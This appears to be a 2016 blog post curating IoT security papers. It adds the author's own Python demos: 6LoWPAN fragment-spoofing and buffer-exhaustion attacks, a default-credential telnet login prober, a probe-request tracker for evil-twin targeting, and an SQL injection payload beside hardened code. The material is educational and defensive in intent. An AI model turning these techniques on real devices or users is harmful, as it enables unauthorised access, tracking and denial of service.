Attacking the Internet of Things for Fun and Profit

Last updated 22nd Sept. 2016.

Below we’re collecting the most interesting and influential IoT security papers. This post targets engineering professionals who want to jump-start their IoT security foo, or who wish to move into this Brave New World that is the Internet of Things and, more specifically, learn about IoT security.

Venture capitalists, whenever they hear you’re working on some new InfoSec idea for the IoT.

The content below is evolving (hopefully with your help). If you find something missing, please drop me a tweet or comment below and let us know why a certain document should be mentioned.

Sitting comfortably?

OK then, before we begin let’s get some basic terminology right (or not). The IoT brings together many different industries, and because it means many different things to different people, precise language and avoiding ambiguity are important. I personally have a slight dislike for new buzzwords like “Internet of Cars” or “Internet of ” and would prefer that industries concentrate on the common technical and social challenges presented instead of trying to redefine terminology.

IMO the IoT is never limited to consumer devices, though some people see it only through that lens. The IoT is better summed up as the collective challenges and opportunities presented by connecting to an IP-based protocol any device which previously had no such network connection. This then includes ICS/SCADA, M2M networks, connected cars, in-vehicle networks, …

The picture illustrates the usual process of how Tech Terminology is being agreed upon.


In case you need a more general, “high-level” overview of IoT security, please check out these IETF drafts on “Security Considerations in the IP-based Internet of Things” or the 6LoWPAN-specific “IPv6 over Low Power WPAN Security Analysis”; both contain some very readable references at the bottom that let you dive in as deep as you’re comfortable going.

Not a security paper as such, but still an excellent resource, is RFC 6568: “Design and Application Spaces for IPv6 over Low-Power Wireless Personal Area Networks (6LoWPANs)”. It illustrates some real-life 6LoWPAN deployment scenarios using examples from different IoT verticals such as Connected Home, Industrial/Structural/Agricultural Monitoring, Healthcare and Vehicle Telematics. Another more general resource worth studying is the NATO Cyber Security Framework. If you’re looking at the IoT through a defence and national cyber security lens, then I’d like to point you to my article on smart cities and cyberwar.


6LoWPAN Fragmentation Attacks and Mitigation Mechanisms:

As the title says, this paper is heavily focused on 6LoWPAN attacks. It gives an overview of how 6LoWPAN fragmentation works (an IPv6 packet larger than the 127-byte IEEE 802.15.4 frame is split across several frames and put back together by the receiver) and how an attacker can abuse that reassembly process against trivial infrastructure (your home automation) or critical infrastructure such as industrial control systems.

6LoWPAN fragmentation Attacks and Mitigation Mechanisms
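To make the attack surface concrete, here is an added example (my own code, not taken from the paper) of the RFC 4944 fragment headers and a deliberately naive reassembler of the kind found on constrained nodes, together with the two attacks the paper describes: spoofing a fragment into a datagram in flight (fragment duplication) and tying up the node’s few reassembly buffers with first fragments that are never completed (buffer reservation). Sender addresses, tags, payloads and the two-slot limit are constructed for the demo; the slot limit stands in for a real node’s small reassembly table.

```python
import struct

# Dispatch values from RFC 4944 (top five bits of the first header byte)
FRAG1 = 0b11000   # first fragment:  | 11000 | size(11) | tag(16) |
FRAGN = 0b11100   # later fragments: | 11100 | size(11) | tag(16) | offset(8) |


def build_frag1(size, tag, payload):
    return struct.pack("!HH", (FRAG1 << 11) | (size & 0x7FF), tag) + payload


def build_fragn(size, tag, offset, payload):
    # the offset field counts 8-octet units
    return struct.pack("!HHB", (FRAGN << 11) | (size & 0x7FF), tag, offset // 8) + payload


def parse_fragment(frame):
    """Return (datagram_size, datagram_tag, byte_offset, payload); raise on a non-fragment."""
    if len(frame) < 4:
        raise ValueError("frame too short")
    first, tag = struct.unpack("!HH", frame[:4])
    dispatch, size = first >> 11, first & 0x7FF
    if dispatch == FRAG1:
        return size, tag, 0, frame[4:]
    if dispatch == FRAGN and len(frame) >= 5:
        return size, tag, frame[4] * 8, frame[5:]
    raise ValueError("not a 6LoWPAN fragment")


class NaiveReassembler:
    """Reassembly the way a constrained node typically does it: a handful of fixed
    buffers keyed by (link-layer source, tag), the first fragment seen for an offset
    wins, and a buffer is held until the datagram completes (no timeout here)."""

    def __init__(self, slots=2):
        self.slots = slots
        self.buffers = {}   # (src, tag) -> {"size", "data", "seen", "got"}

    def receive(self, src, frame):
        size, tag, offset, payload = parse_fragment(frame)
        key = (src, tag)
        if key not in self.buffers:
            if len(self.buffers) >= self.slots:
                return "dropped: no free reassembly buffer"
            self.buffers[key] = {"size": size, "data": bytearray(size), "seen": set(), "got": 0}
        buf = self.buffers[key]
        if offset + len(payload) > buf["size"]:
            return "dropped: fragment overruns datagram"
        if offset in buf["seen"]:
            return "ignored: offset already filled"   # first writer wins
        buf["data"][offset:offset + len(payload)] = payload
        buf["seen"].add(offset)
        buf["got"] += len(payload)
        if buf["got"] < buf["size"]:
            return "pending"
        del self.buffers[key]
        return bytes(buf["data"])


def demo_fragment_duplication():
    """Attacker spoofs node-a's address and tag and lands its fragment at offset 8 first."""
    r = NaiveReassembler(slots=2)
    legit = b"A" * 8 + b"B" * 8 + b"C" * 4          # constructed 20-byte datagram
    size, tag = len(legit), 0x1234
    r.receive("node-a", build_frag1(size, tag, legit[:8]))
    r.receive("node-a", build_fragn(size, tag, 8, b"X" * 8))      # spoofed fragment
    r.receive("node-a", build_fragn(size, tag, 8, legit[8:16]))   # genuine one is ignored
    return r.receive("node-a", build_fragn(size, tag, 16, legit[16:]))


def demo_buffer_reservation():
    """Attacker opens two never-finished 1280-byte datagrams; node-a's traffic is dropped."""
    r = NaiveReassembler(slots=2)
    for tag in (0xDEAD, 0xBEEF):
        r.receive("attacker", build_frag1(1280, tag, b"\x00" * 8))
    return r.receive("node-a", build_frag1(20, 0x0001, b"A" * 8))


if __name__ == "__main__":
    print(demo_fragment_duplication())
    print(demo_buffer_reservation())
```

The first-writer-wins rule is what makes the duplication attack work: the node has no way to tell which of two fragments with the same tag and offset is genuine, and the 16-bit tag is either sniffed or guessed. The reservation demo returns the drop status that the legitimate node’s first fragment receives; without a reassembly timeout the attacker holds the buffers indefinitely, and even with one it only has to resend its bogus first fragments.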


A Quantitative Analysis of the Insecurity of Embedded Network Devices: Results of a Wide-Area Scan

Many IoT devices are vulnerable to simple intrusion attempts, for example via weak or even default passwords. Malware is taking over these devices, so once compromised they can later be used to participate in DDoS attacks or to send spam and phishing mails as part of a massive botnet. In 2012 the Carna botnet showed that there were more than 1.2 million open devices that allowed logins with empty or default credentials. This paper explores strategies to significantly reduce the number of trivially vulnerable embedded devices currently on the Internet.

A Quantitative Analysis of the Insecurity of Embedded Network Devices: Results of a Wide-Area Scan
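The kind of check behind such a scan, reduced to something you can run against your own inventory, as an added example (my code, not the paper’s tooling): a telnet-style login probe that walks a short list of factory credentials and reports which ones hand out a shell prompt. So that it runs offline, the block also starts a constructed stand-in for a device’s telnet login on localhost; the credential list, the `login:`/`Password:` prompts and the `# ` success prompt are assumptions for the demo.

```python
import socket
import threading

# Constructed sample of the factory credentials a scanner tries first
DEFAULT_CREDS = [("admin", "admin"), ("root", "root"), ("admin", ""), ("root", "")]


def start_fake_device(valid, host="127.0.0.1"):
    """Stand-in for an embedded device's telnet login (demo only). Returns the bound port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(8)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn, conn.makefile("rb") as rf:
                conn.sendall(b"login: ")
                user = rf.readline().strip().decode("ascii", "replace")
                conn.sendall(b"Password: ")
                pw = rf.readline().strip().decode("ascii", "replace")
                conn.sendall(b"\r\n# " if (user, pw) == valid else b"\r\nLogin incorrect\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def _recv_until(sock, marker, limit=4096):
    """Read until `marker` appears, the peer closes, or `limit` bytes arrive."""
    buf = b""
    while marker not in buf and len(buf) < limit:
        chunk = sock.recv(256)
        if not chunk:
            break
        buf += chunk
    return buf


def try_login(host, port, user, password, timeout=3.0):
    """One login attempt; True if the device answered with a shell prompt."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        _recv_until(s, b"login:")
        s.sendall(user.encode() + b"\r\n")
        _recv_until(s, b"Password:")
        s.sendall(password.encode() + b"\r\n")
        reply = _recv_until(s, b"# ")
    return reply.rstrip().endswith(b"#")


def audit_device(host, port, creds=DEFAULT_CREDS):
    """Return every (user, password) pair from `creds` that logs in."""
    return [(u, p) for u, p in creds if try_login(host, port, u, p)]


if __name__ == "__main__":
    port = start_fake_device(("admin", "admin"))
    print(audit_device("127.0.0.1", port))
```

Two caveats before pointing this at real hardware: a real telnetd opens with IAC option negotiation that the probe must answer or strip before it sees the `login:` prompt, and many devices lock out or rate-limit after a few failures, so the list order matters. Only test devices you own or are authorised to test.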


Digital Terrestrial Tracking: The Future of Surveillance (on a budget)

The next paper has been all over DefCon and BlackHat and illustrates a concept tool called Snoopy that shows how creepy things can become if we let them. Snoopy uses an onboard computer, a GPS unit, a GSM cellular unit for network connectivity and attached video cameras on a quadcopter drone to capture wireless network traffic and to follow targets in a defined area. It also takes advantage of Bluetooth and RFID traffic to track devices and their owners, and it tracks probe requests from devices such as smartphones, which constantly search for WiFi networks they have previously associated with. The Snoopy drone then offers a WiFi network with the same name as the one being probed for. When a smartphone joins this network, Snoopy proxies its traffic and can therefore capture the data the phone transmits. Snoopy can also capture data from devices such as pacemakers that use WiFi, as well as fitness devices and smart cards.

Digital Terrestrial Tracking: The Future of Surveillance
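The probe-request leak is the part of Snoopy that is easiest to reproduce on a desk, so here is an added example (my own code, not Snoopy’s) that parses 802.11 probe requests, collects per client MAC the SSIDs it asks for by name, and turns that into the list an evil twin would beacon. The frames are constructed in the block rather than captured, and the MAC addresses and SSIDs are made up for the demo; on a real capture you would feed in the raw management frames from a monitor-mode interface.

```python
import struct
from collections import defaultdict

TYPE_MGMT, SUBTYPE_PROBE_REQ = 0, 4    # 802.11 frame control type / subtype
TAG_SSID, TAG_RATES = 0, 1             # information element IDs


def build_probe_request(src_mac, ssid, seq=0):
    """Constructed probe request, as a phone sends when looking for a remembered network."""
    fc = struct.pack("<H", (TYPE_MGMT << 2) | (SUBTYPE_PROBE_REQ << 4))
    header = (fc + b"\x00\x00"            # duration
              + b"\xff" * 6               # addr1: broadcast destination
              + src_mac                   # addr2: the client's own MAC
              + b"\xff" * 6               # addr3: wildcard BSSID
              + struct.pack("<H", seq << 4))
    ssid_ie = bytes([TAG_SSID, len(ssid)]) + ssid      # empty SSID = broadcast probe
    rates_ie = bytes([TAG_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    return header + ssid_ie + rates_ie


def parse_probe_request(frame):
    """Return (source MAC, SSID) for a probe request; None for any other or malformed frame."""
    if len(frame) < 24:
        return None
    fc, = struct.unpack("<H", frame[:2])
    if ((fc >> 2) & 0x3, (fc >> 4) & 0xF) != (TYPE_MGMT, SUBTYPE_PROBE_REQ):
        return None
    src = ":".join(f"{b:02x}" for b in frame[10:16])
    pos = 24                                   # tagged parameters follow the fixed header
    while pos + 2 <= len(frame):
        tag, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2:pos + 2 + length]
        if len(value) != length:
            return None                        # truncated IE: treat the frame as malformed
        if tag == TAG_SSID:
            return src, value.decode("utf-8", "replace")
        pos += 2 + length
    return None


class ProbeTracker:
    """Accumulates, per client MAC, the SSIDs it has asked for by name."""

    def __init__(self):
        self.probed = defaultdict(set)

    def observe(self, frame):
        parsed = parse_probe_request(frame)
        if parsed is None:
            return False
        src, ssid = parsed
        if ssid:                               # broadcast probes leak no network name
            self.probed[src].add(ssid)
        return True

    def evil_twin_targets(self):
        """SSID -> sorted clients that would auto-join a rogue AP beaconing that SSID."""
        targets = defaultdict(set)
        for mac, ssids in self.probed.items():
            for ssid in ssids:
                targets[ssid].add(mac)
        return {ssid: sorted(macs) for ssid, macs in targets.items()}


if __name__ == "__main__":
    t = ProbeTracker()
    t.observe(build_probe_request(bytes.fromhex("020000000001"), b"HomeWifi"))
    t.observe(build_probe_request(bytes.fromhex("020000000002"), b"HomeWifi", seq=1))
    print(t.evil_twin_targets())
```

One caveat a practitioner should keep in mind: current phone operating systems randomise the MAC address used in probe requests and mostly send broadcast (empty-SSID) probes, so the tracking half of this technique works far less well against up-to-date devices than it did when Snoopy was presented. The rogue-network half still works for remembered open networks, because a client identifies those by SSID alone.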


Cross domain contamination:

The IoT benefits from a massive amount of “cross-domain fertilization” (holy sh1t, this sentence is so much buzz it makes my head spin even without a hashtag) and ideas jump the fence across traditional industry silos. But from a security perspective (think Heartbleed, Logjam or DROWN) this fertilization becomes cross-domain contamination.

IoT Cross-Domain contamination. You’re a heartbleed now.

With the Web of Things (structured data, JSON-LD, RESTful APIs, CoAP and the Web’s bug-ridden backend/middleware systems) becoming the way we interface with and structure data in the IoT, we transport the same flaws and challenges over into the real world. These challenges are old news and are usually aimed at the web-facing IoT control interfaces; they range from cross-site scripting (XSS) to SQL injection and even attacks against the UI/UX design … basically anything that we have never really solved in the “Web of Pages” we’ll be even harder pressed to secure in the IoT.
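The two classic web flaws named above, carried over into a device portal, as an added example (my code, not from any product or paper): a device-state lookup written with string-built SQL next to its parameterised replacement, and the HTML rendering of device names with and without output encoding. The device table, owners and device names are constructed for the demo.

```python
import html
import sqlite3


def make_demo_db():
    """Constructed device table standing in for an IoT portal's backend."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE devices (id INTEGER PRIMARY KEY, owner TEXT, name TEXT, state TEXT);
        INSERT INTO devices (owner, name, state) VALUES
            ('alice', 'thermostat', '21C'),
            ('alice', 'front-door', 'locked'),
            ('bob',   'garage',     'closed');
    """)
    return db


def device_state_vulnerable(db, owner, name):
    # String-built SQL: the caller's `name` becomes part of the statement text,
    # so a quote in it rewrites the WHERE clause (the owner check is bypassed).
    query = f"SELECT name, state FROM devices WHERE owner = '{owner}' AND name = '{name}'"
    return db.execute(query).fetchall()


def device_state_hardened(db, owner, name):
    # Parameterised: values travel separately from the statement and are never parsed as SQL.
    return db.execute(
        "SELECT name, state FROM devices WHERE owner = ? AND name = ?", (owner, name)
    ).fetchall()


def rename_device(db, owner, old, new):
    """Parameterised update; the new name may still carry markup, which is the renderer's problem."""
    db.execute("UPDATE devices SET name = ? WHERE owner = ? AND name = ?", (new, owner, old))


def render_vulnerable(rows):
    # Device names are user-controlled; inlining them unescaped is stored XSS.
    return "".join(f"<li>{name}: {state}</li>" for name, state in rows)


def render_hardened(rows):
    # html.escape turns <, >, &, quotes into entities, so the name stays text.
    return "".join(f"<li>{html.escape(name)}: {html.escape(state)}</li>" for name, state in rows)


if __name__ == "__main__":
    db = make_demo_db()
    print(device_state_vulnerable(db, "alice", "x' OR '1'='1"))   # every row, all owners
    print(device_state_hardened(db, "alice", "x' OR '1'='1"))     # nothing matches
```

The injection payload works because `AND` binds tighter than `OR`, so the rewritten clause reads `(owner = 'alice' AND name = 'x') OR '1'='1'`. The same two fixes apply whether the interface is a web page, a CoAP/REST endpoint or a mobile app talking to the same backend: bind values instead of concatenating them, and encode for the output context instead of trusting stored data.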

Hacking Medical Devices for Fun and Insulin: Breaking the Human SCADA System

This paper by Jerome Radcliffe has likewise been all over security conferences and is an infamous flagship example of security fails. The attack illustrates how to mess with a patient’s insulin pump, potentially killing the target.

Hacking Insulin pumps and medical devices


The Cloud Security Alliance has an excellent paper on Security Guidance for Early Adopters of the Internet of Things (IoT), dated April 2015. It provides a bird’s-eye perspective on the major security and privacy challenges to be considered.

Security Guidance for Early Adopters of the Internet of Things (IoT)

The Industrial Internet of Things Volume G4: Security Framework was rolled out by the Industrial Internet Consortium. It is a set of best practices to help developers and users assess risks and defend against them. Like other IIC projects, the security framework is an attempt to build consensus among companies building and using the IoT. The group has laid out a systematic way to implement security in the IoT and a common language for talking about it.

Industrial Internet of Things Volume G4: Security Framework

This is just a start; this post will grow in content over time … please help by suggesting relevant content, especially anything related to practical attacks, threat models, etc.

We have started a LinkedIn discussion group for IoT Security which is growing at tremendous speed and has some very knowledgeable people participating (many well known within the InfoSec community who often speak at places like DefCon, CCC, BlackHat, HITB …). You should come and join us!


Valbonne Consulting provides Research & Consulting for emerging technologies in Internet/Web of Things (WoT/IoT/M2M) and Emerging-Tech. We specialise in decentralisation, security and privacy. We work across a variety of traditional industry verticals (Telecommunications, Automotive, Energy, ...). We support Open Source and technologies built on open standards.

Joachim Bauernberger
Passionate about Open Source, GNU/Linux and Security since 1996. I write about future technology and how to make R&D faster. Expatriate, Entrepreneur, Adventurer and Foodie, currently living near Nice, France.
